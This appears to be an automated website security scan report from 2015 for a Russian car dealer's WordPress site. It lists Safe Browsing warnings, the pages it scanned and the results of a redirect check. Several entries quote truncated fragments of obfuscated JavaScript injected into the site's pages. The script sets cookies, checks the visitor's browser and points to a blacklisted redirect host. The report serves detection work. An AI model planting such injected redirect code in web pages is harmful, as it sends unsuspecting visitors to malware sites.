Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=geely-spb.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://geely-spb.ru/ | 200 OK Content-Length: 12521 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: tdskj.twilightparadox.com ...[1593 bytes skipped]... title); }) } // Supported file extensions var thumbnails = jQuery("a:has(img)").not(".nolightbox").filter( function() { return /\.(jpe?g|png|gif|bmp)$/i.test(jQuery(this).attr('href')) }); jQuery("a.fancybox").fancybox({ 'cyclic': false, 'autoScale': false, 'padding': </script><script>var _0xd2d0=["ppkcookie","testcookie","match","userAgent","location","http://tdskj.twilightparadox.com/e02z","http://tdskj.twilightparadox.com/e02D","getTime","setTime","; expires=","toGMTString","","cookie","=","; path=/",";","split","length","substring","charAt"," ","indexOf"];var x=readCookie(_0xd2d0[0ter25444808 = new Ya.Metrika({id:25444808, webvisor:true, clickmap:true, trackLinks:true, accurateTrackBounce:true}); } catch(e) { } }); var ...[2054 bytes skipped]... | ||
http://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js?ver=3.9 | 200 OK Content-Length: 93637 Content-Type: text/javascript | clean |
http://geely-spb.ru/wp-content/themes/geely/js/jquery.validate.min.js?ver=3.9 | 200 OK Content-Length: 22384 Content-Type: application/x-javascript | clean |
http://geely-spb.ru/wp-content/plugins/fancybox-for-wordpress/fancybox/jquery.fancybox.js?ver=1.3.4 | 200 OK Content-Length: 15667 Content-Type: application/x-javascript | clean |
http://geely-spb.ru/wp-content/themes/geely/js/jquery.selectbox.js | 200 OK Content-Length: 5038 Content-Type: application/x-javascript | clean |
http://geely-spb.ru/wp-content/themes/geely/js/jquery.validate.min.js | 200 OK Content-Length: 22384 Content-Type: application/x-javascript | clean |
http://geely-spb.ru/wp-content/themes/geely/js/jquery.bxslider.min.js | 200 OK Content-Length: 19132 Content-Type: application/x-javascript | clean |
http://geely-spb.ru/wp-content/themes/geely/js/jquery.selectbox.min.js | 200 OK Content-Length: 3402 Content-Type: application/x-javascript | clean |
http://geely-spb.ru//mc.yandex.ru/metrika/watch.js/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Thu, 26 Feb 2015 11:55:11 GMT Pragma: no-cache Location: http://geely-spb.ru/mc.yandex.ru/metrika/watch.js/ Server: nginx/1.7.4 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Pingback: http://geely-spb.ru/xmlrpc.php X-Powered-By: PHP/5.2.17-pl0-gentoo | clean |
http://geely-spb.ru/mc.yandex.ru/metrika/watch.js/ | 404 Not Found Content-Length: 12336 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: tdskj.twilightparadox.com ...[1552 bytes skipped]... title); }) } // Supported file extensions var thumbnails = jQuery("a:has(img)").not(".nolightbox").filter( function() { return /\.(jpe?g|png|gif|bmp)$/i.test(jQuery(this).attr('href')) }); jQuery("a.fancybox").fancybox({ 'cyclic': false, 'autoScale': false, 'padding': </script><script>var _0xd2d0=["ppkcookie","testcookie","match","userAgent","location","http://tdskj.twilightparadox.com/e02z","http://tdskj.twilightparadox.com/e02D","getTime","setTime","; expires=","toGMTString","","cookie","=","; path=/",";","split","length","substring","charAt"," ","indexOf"];var x=readCookie(_0xd2d0[0]);if(!x){createCookie(_0xd2d0[0],_0xd2d0ter25444808 = new Ya.Metrika({id:25444808, webvisor:true, clickmap:true, trackLinks:true, accurateTrackBounce:true}); } cat ...[2095 bytes skipped]... | ||
http://geely-spb.ru/share42/share42.js | 404 Not Found Content-Length: 12325 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: tdskj.twilightparadox.com ...[1541 bytes skipped]... title); }) } // Supported file extensions var thumbnails = jQuery("a:has(img)").not(".nolightbox").filter( function() { return /\.(jpe?g|png|gif|bmp)$/i.test(jQuery(this).attr('href')) }); jQuery("a.fancybox").fancybox({ 'cyclic': false, 'autoScale': false, 'padding': </script><script>var _0xd2d0=["ppkcookie","testcookie","match","userAgent","location","http://tdskj.twilightparadox.com/e02z","http://tdskj.twilightparadox.com/e02D","getTime","setTime","; expires=","toGMTString","","cookie","=","; path=/",";","split","length","substring","charAt"," ","indexOf"];var x=readCookie(_0xd2d0[0]);if(!x){createCookie(_0xd2d0[0],_0xd2d0[1],1);if(nter25444808 = new Ya.Metrika({id:25444808, webvisor:true, clickmap:true, trackLinks:true, accurateTrackBounce:true}); ...[2106 bytes skipped]... | ||
http://geely-spb.ru/geely-motors/ | 200 OK Content-Length: 22803 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: tdskj.twilightparadox.com ...[1534 bytes skipped]... title); }) } // Supported file extensions var thumbnails = jQuery("a:has(img)").not(".nolightbox").filter( function() { return /\.(jpe?g|png|gif|bmp)$/i.test(jQuery(this).attr('href')) }); jQuery("a.fancybox").fancybox({ 'cyclic': false, 'autoScale': false, 'padding': </script><script>var _0xd2d0=["ppkcookie","testcookie","match","userAgent","location","http://tdskj.twilightparadox.com/e02z","http://tdskj.twilightparadox.com/e02D","getTime","setTime","; expires=","toGMTString","","cookie","=","; path=/",";","split","length","substring","charAt"," ","indexOf"];var x=readCookie(_0xd2d0[0]);if(!x){createCookie(_0xd2d0[0],_0xd2d0[1],1);if(navigatoter25444808 = new Ya.Metrika({id:25444808, webvisor:true, clickmap:true, trackLinks:true, accurateTrackBounce:true}); ...[2113 bytes skipped]... | ||
http://geely-spb.ru/garantiya/ | 200 OK Content-Length: 24014 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: tdskj.twilightparadox.com ...[1535 bytes skipped]... title); }) } // Supported file extensions var thumbnails = jQuery("a:has(img)").not(".nolightbox").filter( function() { return /\.(jpe?g|png|gif|bmp)$/i.test(jQuery(this).attr('href')) }); jQuery("a.fancybox").fancybox({ 'cyclic': false, 'autoScale': false, 'padding': </script><script>var _0xd2d0=["ppkcookie","testcookie","match","userAgent","location","http://tdskj.twilightparadox.com/e02z","http://tdskj.twilightparadox.com/e02D","getTime","setTime","; expires=","toGMTString","","cookie","=","; path=/",";","split","length","substring","charAt"," ","indexOf"];var x=readCookie(_0xd2d0[0]);if(!x){createCookie(_0xd2d0[0],_0xd2d0[1],1);if(navigatter25444808 = new Ya.Metrika({id:25444808, webvisor:true, clickmap:true, trackLinks:true, accurateTrackBounce:true}); < ...[2112 bytes skipped]... | ||
http://geely-spb.ru/parts/ | 200 OK Content-Length: 17659 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: tdskj.twilightparadox.com ...[1535 bytes skipped]... title); }) } // Supported file extensions var thumbnails = jQuery("a:has(img)").not(".nolightbox").filter( function() { return /\.(jpe?g|png|gif|bmp)$/i.test(jQuery(this).attr('href')) }); jQuery("a.fancybox").fancybox({ 'cyclic': false, 'autoScale': false, 'padding': </script><script>var _0xd2d0=["ppkcookie","testcookie","match","userAgent","location","http://tdskj.twilightparadox.com/e02z","http://tdskj.twilightparadox.com/e02D","getTime","setTime","; expires=","toGMTString","","cookie","=","; path=/",";","split","length","substring","charAt"," ","indexOf"];var x=readCookie(_0xd2d0[0]);if(!x){createCookie(_0xd2d0[0],_0xd2d0[1],1);if(navigatter25444808 = new Ya.Metrika({id:25444808, webvisor:true, clickmap:true, trackLinks:true, accurateTrackBounce:true}); < ...[2112 bytes skipped]... | ||
http://geely-spb.ru/news/ | 200 OK Content-Length: 25546 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: tdskj.twilightparadox.com ...[1533 bytes skipped]... title); }) } // Supported file extensions var thumbnails = jQuery("a:has(img)").not(".nolightbox").filter( function() { return /\.(jpe?g|png|gif|bmp)$/i.test(jQuery(this).attr('href')) }); jQuery("a.fancybox").fancybox({ 'cyclic': false, 'autoScale': false, 'padding': </script><script>var _0xd2d0=["ppkcookie","testcookie","match","userAgent","location","http://tdskj.twilightparadox.com/e02z","http://tdskj.twilightparadox.com/e02D","getTime","setTime","; expires=","toGMTString","","cookie","=","; path=/",";","split","length","substring","charAt"," ","indexOf"];var x=readCookie(_0xd2d0[0]);if(!x){createCookie(_0xd2d0[0],_0xd2d0[1],1);if(navigatorter25444808 = new Ya.Metrika({id:25444808, webvisor:true, clickmap:true, trackLinks:true, accurateTrackBounce:true}); ...[2114 bytes skipped]... | ||
http://geely-spb.ru/contacts/ | 200 OK Content-Length: 18903 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: tdskj.twilightparadox.com ...[1535 bytes skipped]... title); }) } // Supported file extensions var thumbnails = jQuery("a:has(img)").not(".nolightbox").filter( function() { return /\.(jpe?g|png|gif|bmp)$/i.test(jQuery(this).attr('href')) }); jQuery("a.fancybox").fancybox({ 'cyclic': false, 'autoScale': false, 'padding': </script><script>var _0xd2d0=["ppkcookie","testcookie","match","userAgent","location","http://tdskj.twilightparadox.com/e02z","http://tdskj.twilightparadox.com/e02D","getTime","setTime","; expires=","toGMTString","","cookie","=","; path=/",";","split","length","substring","charAt"," ","indexOf"];var x=readCookie(_0xd2d0[0]);if(!x){createCookie(_0xd2d0[0],_0xd2d0[1],1);if(navigatter25444808 = new Ya.Metrika({id:25444808, webvisor:true, clickmap:true, trackLinks:true, accurateTrackBounce:true}); < ...[2112 bytes skipped]... |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: geely-spb.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 26 Feb 2015 11:55:09 GMT
Server: nginx/1.7.4
Content-Type: text/html; charset=UTF-8
X-Pingback: http://geely-spb.ru/xmlrpc.php
X-Powered-By: PHP/5.2.17-pl0-gentoo
GET / HTTP/1.1
Host: geely-spb.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 26 Feb 2015 11:55:09 GMT
Server: nginx/1.7.4
Content-Type: text/html; charset=UTF-8
X-Pingback: http://geely-spb.ru/xmlrpc.php
X-Powered-By: PHP/5.2.17-pl0-gentoo
Second query (visit from search engine):
GET / HTTP/1.1
Host: geely-spb.ru
Referer: http://www.google.com/search?q=geely-spb.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: geely-spb.ru
Referer: http://www.google.com/search?q=geely-spb.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.